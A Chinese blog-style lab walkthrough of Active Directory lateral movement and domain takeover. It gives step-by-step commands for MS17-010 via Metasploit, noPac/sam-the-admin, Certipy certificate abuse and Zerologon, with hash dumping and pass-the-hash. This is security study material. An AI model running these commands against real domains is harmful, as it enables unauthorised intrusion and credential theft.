第133天:内网安全-横向移动域控提权NetLogonADCSPACKDC永恒之蓝
案例一:横向移动-系统漏洞-CVE-2017-0146
这个漏洞就是大家熟悉的ms17-010,这里主要学习cs发送到msf,并且msf正向连接后续
原因是cs只能支持漏洞检测,而msf上有很多exp可以利用
注意msf不能使用4.5版本的有bug
这里还是反弹权限,然后提权到system
设置监听器
msf开启监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 8888
exploit
转发msf上
转发到刚才的会话上
msf成功上线
这是3网段的主机,所以可以连接到3网段所有主机,但是需要设置路由
run autoroute -p //查看当前路由表
run post/multi/manage/autoroute //添加当前路由表
会话放入后台
这里利用ms17-010的时候反向没有办法上线的,因为内网的主机不出网,只有正向去连接他
首先先检测是否有该漏洞
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.3.21-32 //设置扫描目标段
set threads 5 //设置扫描线程数
run
这里我的域控环境网段不是连续的,就扫描一个dc
可以利用,这里因为内网是不出网的所以需要借助已经拿到的机器,去控制目标主机,正向连接
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp //正向连接上线
set rhost 192.168.3.25 //设置连接目标或者范围
run本来是希望去控制域控主机的,但是域控主机似乎做了某种限制,这里我控制的是sqladmin
成功
msf正向连接中,设置了路由就可以,甚至不用上传木马,不知道是不是msf17-010的溢出不用
案例二: 横向移动-域控提权-CVE-2014-6324
在这篇文章里面复现过
第130天:内网安全-横向移动&PTH哈希&PTT 票据&PTK密匙&Kerberos&密码喷射-CSDN博客
案例三:横向移动-域控提权-CVE-2021-42287
前提条件:一个域内普通账号
影响版本:Windows基本全系列
这篇文章也复现过,这里还有不同的工具
第106天:权限提升-WIN 系统&AD域控&NetLogon&ADCS&PAC&KDC&CVE 漏洞_windows 提权漏洞补丁 ad域-CSDN博客
方法一:
同样先上线,代理转发
项目下载地址:
https://github.com/safebuffer/sam-the-admin
python3 sam_the_admin.py 域名/'域控主机账号:密码' -dc-ip 域控ip -shell
python3 sam_the_admin.py 0day.org/'administrator:123.com' -dc-ip 192.168.3.142 -shell
查看获得的权限啊
方法二:
nopac下载地址: https://github.com/cube0x0/noPac
把这个文件导入到visual studio中
编译生成文件
在这个目录下会生成exe文件
这里按理说应该设置代理在本地运行,我是linux系统没办法设置,直接上传本地运行
出现下面的提示代表有漏洞
noPac.exe scan -domain 0day.org -user jack -pass admin!@#45
生成票据
noPac.exe -domain 0day.org -user jack -pass admin!@#45 /dc 域控名 /mAccount 乱输一个用户名 -mPassword 乱输一个密码 /service 乱输一个服务 /ptt
noPac -domain 0day.org -user jack -pass admin!@#45 /dc owa2010sp3.0day.org /mAccount dadd /mPassword sdadasdsa /service cifs /ptt
PsExec \\owa2010cn-god.god.org cmd
现在查看票据里面就有一个administrator的票据
利用工具建立连接
psexec.exe \\域控主机名 cmd
案例四:WIN-域控提权-CVE-2022-26923
利用条件
一个域控内普通的账号密码
并且域控内有ca证书服务器
dnshostname不唯一
查看域内是否有证书服务器
certutil -config - -ping
没有的情况
如果有证书服务器
资源下载地址:GitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuse
安装必要的插件
python3 setup.py install
首先先申请一个证书
certipy req 'ip/域用户名:密码@域控计算机名' -target-ip 域控ip -ca CA服务器名 -template User -debug
certipy req '192.168.3.142/jack:admin!@#45@OWA2010SP3.0day.org' -target-ip 192.168.3.142 -ca 0day-OWA2010SP3-CA -template User -debug
检测证书
certipy auth -pfx jack.pfx -dc-ip 192.168.3.142 -debug
添加计算机账号
项目地址:GitCode - 全球开发者的开源社区,开源代码托管平台
python3 bloodyAD.py -d 域控名 -u 普通用户名 -p '普通用户密码' --host 域控ip addComputer 计算机名 '计算机密码'
python3 bloodyAD.py -d 0day.org -u jack -p 'admin!@#45' --host 192.168.3.142 addComputer pwnmachine 'CVEPassword1234*'
域控计算机中这台主机被成功添加了进去
这一步是需要将计算机名更新为与域控一样的名字,在这一步实验的过程中发现无法实现,原因是由于dnshostname在这个环境当中是唯一的
python3 bloodyAD.py -d 0day.org -u jack -p 'admin!@#45' --host 192.168.3.142 setAttribute 'CN=pwnmachine,CN=Computers,DC=0day,DC=org' dNSHostName '["OWA2010SP3.0day.org"]'
后续操作先看这篇文章把
第106天:权限提升-WIN 系统&AD域控&NetLogon&ADCS&PAC&KDC&CVE 漏洞_ad域控提权-CSDN博客
案例五:WIN-域控提权-CVE-2020-1472
影响范围以及利用条件
CVE-2020-1472 是继 MS17010 之后好用的 NetLogon 特权域控提权漏洞,
影响 Windows Server 2008R2 至 Windows Server 2019 的多个版本系统,
只要攻击者能访问到目标域控井且知道域控计算机名即可利用该漏洞 .
该漏洞不要求当前计算机在域内 , 也不要求当前计算机操作系统为 Windows
资源下载地址
POC:https://github.com/SecuraBV/CVE-2020-1472
EXP:https://github.com/dirkjanm/CVE-2020-1472
Impacket:https://github.com/fortra/impacket
获取计算机名,这里这条命令设置代理后,好像识别不出来这条命令无法执行,我只能设置在一个网段运行。。。,但是也有别的办法获取
nbtscan -v -h 192.168.3.21
可以用这种方式获取计算机
测试漏洞是否能够正常使用
python3 zerologon_tester.py OWA2010SP3 192.168.3.142
因为设置代理的话这里是一个一个数据包进行发送的,所以会比较慢。
清空密码凭证
python3 cve-2020-1472-exploit.py OWA2010SP3 192.168.3.142
利用impack套件导出hash
python3 secretsdump.py 0day.org/OWA2010SP3\$@192.168.3.142 -no-pass
导出hash,上面的admin是域控本地的admin而下面的是域控内的
利用套件里面的wmiexec进行连接
python3 wmiexec.py Administrator@192.168.3.142 -hashes aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942
这中方式一般不要使用,会导致内网崩溃!!!,用完记得恢复hash
重置hash的方式:https://zhuanlan.zhihu.com/p/627855713
运行这三条命令
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
生成三个文件
这三个文件保存在本地,利用套件里面的secretdump文件恢复 ,但是他这个只能是在系统本地运行,系统不一定有python环境啊
python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL利用powershell执行这条命令
相关文章:
第133天:内网安全-横向移动域控提权NetLogonADCSPACKDC永恒之蓝
案例一:横向移动-系统漏洞-CVE-2017-0146 这个漏洞就是大家熟悉的ms17-010,这里主要学习cs发送到msf,并且msf正向连接后续 原因是cs只能支持漏洞检测,而msf上有很多exp可以利用 注意msf不能使用4.5版本的有bug 这里还是反弹权…...
【IoTDB 线上小课 06】列式写入=时序数据写入性能“利器”?
【IoTDB 视频小课】更新来啦!今天已经是第六期了~ 关于 IoTDB,关于物联网,关于时序数据库,关于开源... 一个问题重点,3-5 分钟,我们讲给你听: 列式写入到底是? 上一期我们详细了解了…...
【机器学习】小样本学习的实战技巧:如何在数据稀缺中取得突破
我的主页:2的n次方_ 在机器学习领域,充足的标注数据通常是构建高性能模型的基础。然而,在许多实际应用中,数据稀缺的问题普遍存在,如医疗影像分析、药物研发、少见语言处理等领域。小样本学习(Few-Shot Le…...
2024.08.14 校招 实习 内推 面经
地/球🌍 : neituijunsir 交* 流*裙 ,内推/实习/校招汇总表格 1、校招 | 理想汽车2025“理想”技术沙龙开启报名 校招 | 理想汽车2025“理想”技术沙龙开启报名 2、校招 | 紫光国芯2025校园招聘正式启动 校招 | 紫光国芯2025校园招聘正式…...
国产双通道集成电机一体化应用的电机驱动芯片-SS6951A
电机驱动芯片 - SS6951A为电机一体化应用提供一种双通道集成电机驱动方案。SS6951A有两路H桥驱动,每个H桥可提供较大峰值电流4.0A,可驱动两个刷式直流电机,或者一个双极步进电机,或者螺线管或者其它感性负载。双极步进电机可以以整…...
32 - II. 从上到下打印二叉树 II
comments: true difficulty: 简单 edit_url: https://github.com/doocs/leetcode/edit/main/lcof/%E9%9D%A2%E8%AF%95%E9%A2%9832%20-%20II.%20%E4%BB%8E%E4%B8%8A%E5%88%B0%E4%B8%8B%E6%89%93%E5%8D%B0%E4%BA%8C%E5%8F%89%E6%A0%91%20II/README.md 面试题 32 - II. 从上到下打…...
總結熱力學_3
參考: 陈曦<<热力学讲义>>http://ithatron.phys.tsinghua.edu.cn/downloads/thermodynamics.pdf 4 热力学量的测量 4.3 主温度计 常用的气体温度计有等体积气体温度计、声学气体温度计和介电常数气体温度计。很多气体在水的三相点附近都接近理想气体。但真正的理…...
TypeScript学习笔记1---认识ts与js的异同、ts的所有数据类型详解
前言:去年做过几个vue3js的项目,当时考虑到时间问题,js更加熟悉,学习成本低一点,所以只去了解了vue3。最近这段时间补了一下ts的知识点,现今终于有空来码文章了,做个学习总结,方便以…...
华为数通方向HCIP-DataCom H12-821题库(更新单选真题:1-10)
第1题 1、下面是一台路由器的部分配置,关于该配置描述正确的是? [HUAWEllact number 2001 [HUAWEl-acl-basic-2001]rule 0 permit source 1.1.1.1 0 [HUAWEl-acl-basic-2001]rule 1 deny source 1.1.1.0 0 [HUAWEl-acl-basic-2001]rule...
【车载开发系列】单片机烧写的文件
【车载开发系列】单片机烧写的文件 【车载开发系列】单片机烧写的文件 【车载开发系列】单片机烧写的文件一. 什么是bin二. 什么是Hex三. 什么是Motorola S-record(S19)四. ELF格式五. Bin与Hex文件的比对六. 单片机烧写文件的本质 一. 什么是bin bin是…...
pyqt 用lamada关联信号 传递参数 循环
在PyQt中,使用lambda函数来关联信号并传递参数是一个常见的做法,尤其是在需要为不同的对象实例关联不同的槽函数参数时。但是,需要注意的是,直接使用lambda可能会导致一些不易察觉的错误,尤其是当它在循环中使用时。这…...
adb命令
adbclient adbserver adbd 三者之间的关系 adbclient, adbserver, 和 adbd 是 Android Debug Bridge (ADB) 组件中的三个主要组成部分。它们各自扮演着不同的角色,共同协作来实现设备调试和管理的功能。下面我将详细介绍这三个组件之间的关系: adbd (A…...
Spring Boot项目热部署
Spring Boot项目热部署是什么 Spring Boot项目热部署是一种开发时的优化技术,可以使开发人员在修改代码后不需要重新启动应用程序即可实时看到修改的效果。在传统的开发模式中,每次修改代码后都需要重新编译、打包和部署应用程序,这样会浪费大…...
Chat App 项目之解析(八)
Chat App 项目介绍与解析(一)-CSDN博客文章浏览阅读340次,点赞7次,收藏3次。Chat App 是一个实时聊天应用程序,旨在为用户提供一个简单、直观的聊天平台。该应用程序不仅支持普通用户的注册和登录,还提供了…...
CAAC无人机飞行执照:学习内容与考试流程详解
CAAC无人机飞行执照的学习内容与考试流程是无人机爱好者及从业者必须了解的重要信息。以下是对这两方面的详细解析: 学习内容 CAAC无人机飞行执照的学习内容涵盖了多个方面,以确保学员能够全面掌握无人机飞行和应用的技能。主要学习内容包括:…...
苹果手机怎么连接蓝牙耳机?3个方案,3秒连接
在快节奏的现代生活中,无线蓝牙耳机因其便捷性和自由度成为了许多人的首选。那么,苹果手机怎么连接蓝牙耳机呢?本文将为您介绍3种快速连接苹果设备与蓝牙耳机的方案,让您在享受音乐、通话或观看视频时,不再受线缆束缚&…...
CAD图纸加密软件有哪些?10款超级好用的CAD图纸加密软件推荐
在数字化设计日益普及的今天,CAD图纸作为企业的核心资产,其安全性变得尤为重要。为了防止图纸被非法获取、篡改或泄露,使用专业的CAD图纸加密软件成为了许多企业和设计师的首选。本文将为您推荐10款在2024年表现突出的CAD图纸加密软件&#x…...
【html+css 绚丽Loading】000011 三元轮回珠
前言:哈喽,大家好,今天给大家分享htmlcss 绚丽Loading!并提供具体代码帮助大家深入理解,彻底掌握!创作不易,如果能帮助到大家或者给大家一些灵感和启发,欢迎收藏关注哦 💕…...
算法学习018 求最短路径 c++算法学习 中小学算法思维学习 比赛算法题解 信奥算法解析
目录 C求最短路径 一、题目要求 1、编程实现 2、输入输出 二、算法分析 三、程序编写 四、运行结果 五、考点分析 六、推荐资料 C求最短路径 一、题目要求 1、编程实现 给定n个顶点,每个顶点到其它顶点之间有若干条路,选择每条路需要消耗一定…...
vue-element-admin——<keep-alive>不符合预期缓存的原因
vue-element-admin——<keep-alive>不符合预期缓存的原因 本文章,以现在中后台开发用的非常多的开源项目vue-element-admin为案例。首先,列出官方文档与缓存<keep-alive>相关的链接(请认真阅读,出现缓存<keep-ali…...
基于ElementPlus的分页表格组件ReTable
分页表格ReTable 组件实现基于 Vue3 Element Plus Typescript,同时引用 vueUse lodash-es tailwindCss (不影响功能,可忽略) 基于ElTable和ElPagination组件封装的分页表格,支持本地分页以及远程请求两种方式。本地数据分页自带全量数据的…...
力扣题/图论/课程表
课程表 力扣原题 你这个学期必须选修 numCourses 门课程,记为 0 到 numCourses - 1 。 在选修某些课程之前需要一些先修课程。 先修课程按数组 prerequisites 给出,其中 prerequisites[i] [ai, bi] ,表示如果要学习课程 ai 则 必须 先学习课…...
SQL进阶技巧:基于指定规则的缺失值填充问题
目录 0 场景描述 1 数据准备 2 问题分析 3 小结 0 场景描述 有如下breed表。表中有breed、dt、value字段,value值中存在大量的NULL值,NULL值为缺省值,缺省值需要按照一定规则进行填充。 规则如下: 用表中value值紧邻且非空的两行均值进行填充。 1 数据准备 with bre…...
【气象百科】光伏自动气象站的功能优势
随着全球对可再生能源需求的日益增长,光伏发电作为清洁、可再生的能源形式,正逐步成为推动能源转型的重要力量。而光伏自动气象站,作为光伏电站智能化管理的重要组成部分,其独特的功能优势在提升光伏系统效率、优化运维策略、增强…...
嵌入式AI快速入门课程-K510篇 (第二篇 Ubuntu的基础操作)
第二篇 Ubuntu的基础操作 文章目录 第二篇 Ubuntu的基础操作1. 安装 VMware 运行 Ubuntu1.1 安装 VMware 1.2 使用VMware打开Ubuntu1.2.1 下载、解压Ubuntu映像文件1.2.1 在BIOS上启动虚拟化(virtualization)1.1.1 使用VMware运行Ubuntu 2.第1章 Ubuntu操作入门1.1 Ubuntu下打开…...
android13隐藏调节声音进度条下面的设置按钮
总纲 android13 rom 开发总纲说明 目录 1.前言 2.情况分析 3.代码修改 4.编译运行 5.彩蛋 1.前言 将下面的声音调节底下的三个点的设置按钮,隐藏掉。 效果如下 2.情况分析 查看布局文件 通过布局我们可以知道这个按钮就是 com.android.keyguard.AlphaOptimizedImageB…...
Java ArrayList和LinkedList
ArrayList ArrayList是Java中最常用的数据结构之一,它是一个动态数组的实现,允许你在程序中存储和管理一个可变大小的对象列表,我们可以添加或删除元素。 ArrayList 继承了 AbstractList ,并实现了 List 接口。 基本概念 Arra…...
STM32F030行列式按键扫描
1)行扫说明,行列式按键扫描时: 行输出:行逐一输出高电平,其他的为低,既循环只输出一个高电平; 列读入:所有列通过下拉电阻100K后,都变为低电平,逐一读入&…...
FPGA 综合笔记
仿真时阻塞赋值和非阻塞赋值 Use of Non-Blocking Assignment in Testbench : Verilog Use of Non-Blocking Assignment in Testbench : Verilog - Stack Overflow non-blocking assignment does not work as expected in Verilog non-blocking assignment does not work a…...
Android MVVM框架详解与应用
在Android开发中,随着应用复杂度的增加,如何有效地组织和管理代码成为了一个重要的问题。MVVM(Model-View-ViewModel)架构模式因其清晰的结构和高效的开发效率,逐渐成为Android开发者们青睐的架构模式之一。本文将详细…...